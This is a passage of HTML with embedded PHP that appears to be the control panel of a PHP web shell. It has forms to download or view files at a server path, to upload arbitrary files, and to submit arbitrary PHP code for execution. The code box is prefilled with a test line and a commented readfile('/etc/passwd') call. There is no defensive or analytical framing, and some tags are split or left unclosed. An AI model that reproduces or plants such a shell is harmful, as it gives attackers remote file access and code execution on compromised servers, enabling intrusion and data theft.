<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong> ~</strong></td
<td valign="top" bgcolor="#151515" colspan="5">
<strong>
<input name="pathclass" type="text" style="width: 284px" dir="ltr" valu
e="<?php echo realpath('')?>"></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
<td valign="top" bgcolor="#151515" colspan="5"><strong>
<input type="submit" value=""></strong></td>
</tr>
<input name="page" type="hidden" value="download">
</form>

<form method="POST" target="_blank">


<tr>
<td valign="top" colspan="6">&nbsp;</td>
</tr>

<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong> </strong><
>

</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong> ~</strong></td
<td valign="top" bgcolor="#151515" colspan="5">
<strong>
<input name="pathclass" type="text" style="width: 284px" dir="ltr" value
="<?php echo realpath('')?>"></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
<td valign="top" bgcolor="#151515" colspan="5"><strong>
<input type="submit" value="" style="width: 36px"></strong></td>
</tr>
<input name="page" type="hidden" value="show">
</form>

<form method="POST" target="_blank" enctype="multipart/form-data">


<tr>
<td valign="top" colspan="6">&nbsp;</td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong> </strong></
td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>File ~</stro
ng></td>
<td valign="top" bgcolor="#151515" colspan="5">
<input name="img" type="file"></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</stro
ng></td>
<td valign="top" bgcolor="#151515" colspan="5">
<strong>
<input name="pathclass" type="text" style="width: 284px" dir="ltr" value
="<?php echo realpath('')?>"></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
<td valign="top" bgcolor="#151515" colspan="5"><strong>
<input type="submit" value=""></strong></td>
</tr>
<input name="page" type="hidden" value="upload">

</form>

<form method="POST" target="_blank">


<tr>
<td valign="top" colspan="6">&nbsp;</td>
</tr>

<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong> PHP</str
/td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong> ~</strong></td>
<td valign="top" bgcolor="#151515" colspan="5">
<strong>
<textarea name="code" dir="ltr" style="width: 353px; height: 89px">echo
'<center><b>PHP Working</b></center>';
#readfile('/etc/passwd');
</textarea>
</strong>
</td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
<td valign="top" bgcolor="#151515" colspan="5"><strong>
<input type="submit" value="" style="height: 26px"></strong></td>
</tr>
<input name="page" type="hidden" value="code">
</form>
</table>
</td>
</tr>
</table>